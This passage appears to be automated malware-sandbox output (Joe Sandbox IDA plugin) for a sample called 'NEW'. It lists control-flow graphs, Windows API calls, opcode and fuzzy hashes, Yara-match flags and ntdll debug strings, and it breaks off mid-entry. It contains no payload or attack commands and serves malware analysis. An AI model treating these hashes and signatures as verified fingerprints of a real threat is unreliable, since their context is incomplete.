                                                                                    control_flow_graph 0 414394-414396 1 414416-414425 0->1 2 414398 0->2 4 41442b-41445d call 404703 call 425193 1->4 5 414426 call 417ba3 1->5 3 41439a-41439f 2->3 3->3 6 4143a1-4143bd 3->6 11 41447d-414483 4->11 12 41445f-41446e PostThreadMessageW 4->12 5->4 6->1 12->11 13 414470-41447a 12->13 13->11
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(00255Of2,00000111,00000000,00000000), ref: 0041446A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_400000_NEW.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: 00255Of2$00255Of2
                                                                                    • API String ID: 1836367815-1393866396
                                                                                    • Opcode ID: 9860275234762560e8388b943211996fd88b7c3e1b0927fae24cd3b5fccd8234
                                                                                    • Instruction ID: 6841680170837e414d8ee68ffd14d9f00d419d1a13f685439b822e3a075bcc9b
                                                                                    • Opcode Fuzzy Hash: 9860275234762560e8388b943211996fd88b7c3e1b0927fae24cd3b5fccd8234
                                                                                    • Instruction Fuzzy Hash: 711129B2A121587BCB015AA09C81DEE7B6CDE81359B008069FD84B7201D3385D4747A5
                                                                                    Function 004143E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(00255Of2,00000111,00000000,00000000), ref: 0041446A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_400000_NEW.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: 00255Of2$00255Of2
                                                                                    • API String ID: 1836367815-1393866396
                                                                                    • Opcode ID: 2f9239dcebfa159d144bb7b503f5921b80f229cabf01115bab1575a27a12cceb
                                                                                    • Instruction ID: 271a2faaa591c9d6e6db1e9cfa2c7167dbdbf6c6ec6a1f64b8afccaa123d4c6c
                                                                                    • Opcode Fuzzy Hash: 2f9239dcebfa159d144bb7b503f5921b80f229cabf01115bab1575a27a12cceb
                                                                                    • Instruction Fuzzy Hash: 5811C6B2D0121C7EDB119AA19C82EEF7B7CDF45398F448069FA4477101D7785E078BA5
                                                                                    Function 004143F3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 28 4143f3-414405 29 41440d-41445d call 42f5b3 call 417ba3 call 404703 call 425193 28->29 30 414408 call 42eba3 28->30 39 41447d-414483 29->39 40 41445f-41446e PostThreadMessageW 29->40 30->29 40->39 41 414470-41447a 40->41 41->39
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(00255Of2,00000111,00000000,00000000), ref: 0041446A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_400000_NEW.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: 00255Of2$00255Of2
                                                                                    • API String ID: 1836367815-1393866396
                                                                                    • Opcode ID: 5897684b17c08d4a3b3ea78ede45f027ff82af3d0e962109e8e6aa413f46b121
                                                                                    • Instruction ID: 641d106764bd7871e54fb13008b0cf28b80202d8a7b94a19ddae20a9823ec020
                                                                                    • Opcode Fuzzy Hash: 5897684b17c08d4a3b3ea78ede45f027ff82af3d0e962109e8e6aa413f46b121
                                                                                    • Instruction Fuzzy Hash: 2F0188B2D0111C7EDB11AAE19C81EEF7B7C9F41798F448069FA0477241D6785E0647B5
                                                                                    Function 00414484 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 42 414484-41448a 43 414436-41443b 42->43 44 41448c-414499 42->44 51 414441-41445d 43->51 52 41443c call 425193 43->52 45 41449b-41449f 44->45 47 4144a1-4144a6 45->47 48 4144bd-4144c3 45->48 47->48 49 4144a8-4144ad 47->49 48->45 50 4144c5-4144c8 48->50 49->48 53 4144af-4144b6 49->53 54 41447d-414483 51->54 55 41445f-41446e PostThreadMessageW 51->55 52->51 56 4144c9-4144cc 53->56 57 4144b8-4144bb 53->57 55->54 58 414470-41447a 55->58 57->48 57->56 58->54
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(00255Of2,00000111,00000000,00000000), ref: 0041446A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_400000_NEW.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: 00255Of2$00255Of2
                                                                                    • API String ID: 1836367815-1393866396
                                                                                    • Opcode ID: e7479979648abe3028effaf804185b3def2a08024c7416f77b91b1d580e97353
                                                                                    • Instruction ID: 6aa23fba1bcc85a00ba6234f2f4255416af2484868e621a0598437d85ff41d12
                                                                                    • Opcode Fuzzy Hash: e7479979648abe3028effaf804185b3def2a08024c7416f77b91b1d580e97353
                                                                                    • Instruction Fuzzy Hash: DE117A71D145882EDB308EB44C81EEB7B689B85364F4883DEE998873A1D3398C82C759
                                                                                    Function 0042CD43 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 206 42cd43-42cd84 call 404753 call 42dc33 RtlAllocateHeap
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(?,0041E91E,?,?,00000000,?,0041E91E,?,?,?), ref: 0042CD7F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_400000_NEW.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: b291422afab1277ff62b94335d034247e40cb8db2e1ee972acb18dbd04f5ce06
                                                                                    • Instruction ID: 984be99464ea8a0e511d9b0ad4bece1192f89614f68eacda88fea4aeccd9f592
                                                                                    • Opcode Fuzzy Hash: b291422afab1277ff62b94335d034247e40cb8db2e1ee972acb18dbd04f5ce06
                                                                                    • Instruction Fuzzy Hash: 4CE06D762002087FC614EF59DC41E9B73ADEFC9714F004019FA08A7241D7B0B9118BB5
                                                                                    Function 0042CD93 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 211 42cd93-42cdd4 call 404753 call 42dc33 RtlFreeHeap
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,985BA8BF,00000007,00000000,00000004,00000000,00417425,000000F4), ref: 0042CDCF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_400000_NEW.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: d895ccf3f795f216020c7fb14d416f54cb9af9c4f1d97725b2e4c10ec2a29cc2
                                                                                    • Instruction ID: d073d98c3614cad591f8c5c415a8273d31031a41d69a7a76661ae20d9a26413d
                                                                                    • Opcode Fuzzy Hash: d895ccf3f795f216020c7fb14d416f54cb9af9c4f1d97725b2e4c10ec2a29cc2
                                                                                    • Instruction Fuzzy Hash: 39E06D722002087BC614EE59EC41F9B77ACDFC5754F008019FA18A7241C6B0BA10C7B9
                                                                                    Function 0042CDE3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 221 42cde3-42ce1c call 404753 call 42dc33 ExitProcess
                                                                                    APIs
                                                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,6C50F49A,?,?,6C50F49A), ref: 0042CE17
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_400000_NEW.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitProcess
                                                                                    • String ID:
                                                                                    • API String ID: 621844428-0
                                                                                    • Opcode ID: 4bb5dac981b431e742f4426a8473249ad855d4829b79789bbbb5ca46e6b896fc
                                                                                    • Instruction ID: def3be7616ed772aff3aca2395beef2229bc1b2c901884df9646eac8241c3065
                                                                                    • Opcode Fuzzy Hash: 4bb5dac981b431e742f4426a8473249ad855d4829b79789bbbb5ca46e6b896fc
                                                                                    • Instruction Fuzzy Hash: 75E04F722002187BD620BA5AEC41F97BB6CDFC5754F50801AFA0877282C6B0B901C7B4
                                                                                    Function 01892C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 226 1892c0a-1892c0f 227 1892c1f-1892c26 LdrInitializeThunk 226->227 228 1892c11-1892c18 226->228
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 15072ec7a4cae7fddf5ebc271fee91c552ffd59bbc8c216cbe29fc2b87721cd2
                                                                                    • Instruction ID: 3dbc77c47cfe2518c6c417878ffb0adba3d3495826d721d57c054ab7bb6c1682
                                                                                    • Opcode Fuzzy Hash: 15072ec7a4cae7fddf5ebc271fee91c552ffd59bbc8c216cbe29fc2b87721cd2
                                                                                    • Instruction Fuzzy Hash: 0DB09B71E015C5DAEF11E7A44608717790177D1705F59C061D3034651F4738D2D5E276

                                                                                    Non-executed Functions

                                                                                    Function 01908D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • The resource is owned exclusively by thread %p, xrefs: 01908E24
                                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01908F34
                                                                                    • The instruction at %p referenced memory at %p., xrefs: 01908EE2
                                                                                    • a NULL pointer, xrefs: 01908F90
                                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01908DC4
                                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 01908E02
                                                                                    • This failed because of error %Ix., xrefs: 01908EF6
                                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01908E3F
                                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01908FEF
                                                                                    • <unknown>, xrefs: 01908D2E, 01908D81, 01908E00, 01908E49, 01908EC7, 01908F3E
                                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01908F26
                                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01908E86
                                                                                    • an invalid address, %p, xrefs: 01908F7F
                                                                                    • read from, xrefs: 01908F5D, 01908F62
                                                                                    • The resource is owned shared by %d threads, xrefs: 01908E2E
                                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01908F2D
                                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01908DB5
                                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01908E4B
                                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01908DA3
                                                                                    • The critical section is owned by thread %p., xrefs: 01908E69
                                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01908DD3
                                                                                    • *** Inpage error in %ws:%s, xrefs: 01908EC8
                                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01908D8C
                                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 01908F3F
                                                                                    • *** enter .cxr %p for the context, xrefs: 01908FBD
                                                                                    • *** enter .exr %p for the exception record, xrefs: 01908FA1
                                                                                    • The instruction at %p tried to %s , xrefs: 01908F66
                                                                                    • *** then kb to get the faulting stack, xrefs: 01908FCC
                                                                                    • Go determine why that thread has not released the critical section., xrefs: 01908E75
                                                                                    • write to, xrefs: 01908F56
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                    • API String ID: 0-108210295
                                                                                    • Opcode ID: 2ca313aecaeb349820f9165ff8a1d8198d046a86ad8a54935003646a75864654
                                                                                    • Instruction ID: 12cc041f5e844d3f6b438a506caf6b5083e064f74211cc8beec56be883c4f49a
                                                                                    • Opcode Fuzzy Hash: 2ca313aecaeb349820f9165ff8a1d8198d046a86ad8a54935003646a75864654
                                                                                    • Instruction Fuzzy Hash: 67811A79B40314BFDB12AB198C85E6B3B75EF56B10F040048F70DDF292E7758A12D6A2
                                                                                    Function 018D2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-2160512332
                                                                                    • Opcode ID: d9e98a2f2627f84d4e22e19187e3a2a333085a936c3f1dad43c28dd9ebb19e74
                                                                                    • Instruction ID: 07c8ac8d4f23587c6f7f211c8782625d364027980d5c7d66b018276e21afe2b7
                                                                                    • Opcode Fuzzy Hash: d9e98a2f2627f84d4e22e19187e3a2a333085a936c3f1dad43c28dd9ebb19e74
                                                                                    • Instruction Fuzzy Hash: 1B929D71608346AFE721DF28C880F6BB7EABB84754F04492DFA94D7251D770EA44CB92
                                                                                    Function 01888620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • 8, xrefs: 018C52E3
                                                                                    • Thread identifier, xrefs: 018C553A
                                                                                    • double initialized or corrupted critical section, xrefs: 018C5508
                                                                                    • undeleted critical section in freed memory, xrefs: 018C542B
                                                                                    • Critical section address, xrefs: 018C5425, 018C54BC, 018C5534
                                                                                    • Critical section address., xrefs: 018C5502
                                                                                    • corrupted critical section, xrefs: 018C54C2
                                                                                    • Invalid debug info address of this critical section, xrefs: 018C54B6
                                                                                    • Address of the debug info found in the active list., xrefs: 018C54AE, 018C54FA
                                                                                    • Critical section debug info address, xrefs: 018C541F, 018C552E
                                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 018C5543
                                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018C54CE
                                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018C54E2
                                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018C540A, 018C5496, 018C5519
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                    • API String ID: 0-2368682639
                                                                                    • Opcode ID: 7257fb1308a4e52c8738c5fda5803851f9db13155e73b78ed8b2892a03ad418d
                                                                                    • Instruction ID: 1a647fd39f90b179187af4eefcbb27c02006c35bb4fac4be71334c8f0720002b
                                                                                    • Opcode Fuzzy Hash: 7257fb1308a4e52c8738c5fda5803851f9db13155e73b78ed8b2892a03ad418d
                                                                                    • Instruction Fuzzy Hash: 158158B1A41358ABDF20CF99C885BAEBBB5BB49B14F14411DF504F7641D3B9AA40CBA0
                                                                                    Function 018829F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 018C2602
                                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018C25EB
                                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 018C2498
                                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 018C2624
                                                                                    • @, xrefs: 018C259B
                                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 018C2412
                                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018C22E4
                                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018C24C0
                                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 018C261F
                                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 018C2506
                                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 018C2409
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                    • API String ID: 0-4009184096
                                                                                    • Opcode ID: bdb42a5125333f66224bafc4e8ef1d0782497f25bd95babdfcfafbb1c949dca4
                                                                                    • Instruction ID: b6c8137d4f44255a779d327a1bfbd4e19d5e94eef086ae0889d75940cae69d16
                                                                                    • Opcode Fuzzy Hash: bdb42a5125333f66224bafc4e8ef1d0782497f25bd95babdfcfafbb1c949dca4
                                                                                    • Instruction Fuzzy Hash: 6F0250F1D002299FDB31DB58CD80BAAB7BAAF54714F0441DAA609E7281DB709F84CF59
                                                                                    Function 018F8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                    • API String ID: 0-2515994595
                                                                                    • Opcode ID: 78efd7db2cdea8383ace0baa33cc5fe70f72fc9d98031b728e0954b7a9cfa86f
                                                                                    • Instruction ID: 075c0ef6dc19ad6b1181086b51b1b23e0d1c43c8b4ed7c502777a5b523cf7ff5
                                                                                    • Opcode Fuzzy Hash: 78efd7db2cdea8383ace0baa33cc5fe70f72fc9d98031b728e0954b7a9cfa86f
                                                                                    • Instruction Fuzzy Hash: 9A51EF716053169BD326DF198844BABBBE8EF96340F14491DEB98C3281E770D748CB92
                                                                                    Function 0186AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                    • API String ID: 0-3197712848
                                                                                    • Opcode ID: 7358ec0973f7d9d6850ae547cde2e87bc49294da63dc0d05d64651d85431b85d
                                                                                    • Instruction ID: 56af11389d4f011d4e1cc7b8af852ba156a4ecd8c9972c98e9bddd67bbe71f2d
                                                                                    • Opcode Fuzzy Hash: 7358ec0973f7d9d6850ae547cde2e87bc49294da63dc0d05d64651d85431b85d
                                                                                    • Instruction Fuzzy Hash: 8812D0716093468BD325DF28C880BAABBE8BF95718F04051DF985DB291E734DB44CB93
                                                                                    Function 01900274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                    • API String ID: 0-1700792311
                                                                                    • Opcode ID: 7aa805e38ce2dce38f4a701c1caddae574a69649718b4e9d4b3e78ee313c220e
                                                                                    • Instruction ID: a7b3a6987ab6da831cf1ce7cefe0c319e24847940557159a040711042d675c77
                                                                                    • Opcode Fuzzy Hash: 7aa805e38ce2dce38f4a701c1caddae574a69649718b4e9d4b3e78ee313c220e
                                                                                    • Instruction Fuzzy Hash: 8DD1DD35604685EFDB23DFA8C440BA9BBF6FF4A740F088059F4499B292DB35DA81CB15
                                                                                    Function 018D89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • VerifierDebug, xrefs: 018D8CA5
                                                                                    • VerifierDlls, xrefs: 018D8CBD
                                                                                    • VerifierFlags, xrefs: 018D8C50
                                                                                    • HandleTraces, xrefs: 018D8C8F
                                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 018D8A3D
                                                                                    • AVRF: -*- final list of providers -*- , xrefs: 018D8B8F
                                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 018D8A67
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                    • API String ID: 0-3223716464
                                                                                    • Opcode ID: b8bb44bad5b7c21752acab86bc20b240d7ca80a8090d7aca9ccd226af1cdd98f
                                                                                    • Instruction ID: 81f451a82daefa35d809e2396051a57555148945dc345f4c0a97446fa1b38a86
                                                                                    • Opcode Fuzzy Hash: b8bb44bad5b7c21752acab86bc20b240d7ca80a8090d7aca9ccd226af1cdd98f
                                                                                    • Instruction Fuzzy Hash: 81912571A45716EFE721EF6C8880F5B77A4AB96714F060419FA45EB281D730DF00CB92
                                                                                    Function 018D4DD7 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Execute '.cxr %p' to dump context, xrefs: 018D4EB1
                                                                                    • minkernel\ntdll\ldrutil.c, xrefs: 018D4E06
                                                                                    • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 018D4DF5
                                                                                    • LdrpGenericExceptionFilter, xrefs: 018D4DFC
                                                                                    • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 018D4E38
                                                                                    • LdrpProtectedCopyMemory, xrefs: 018D4DF4
                                                                                    • ***Exception thrown within loader***, xrefs: 018D4E27
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
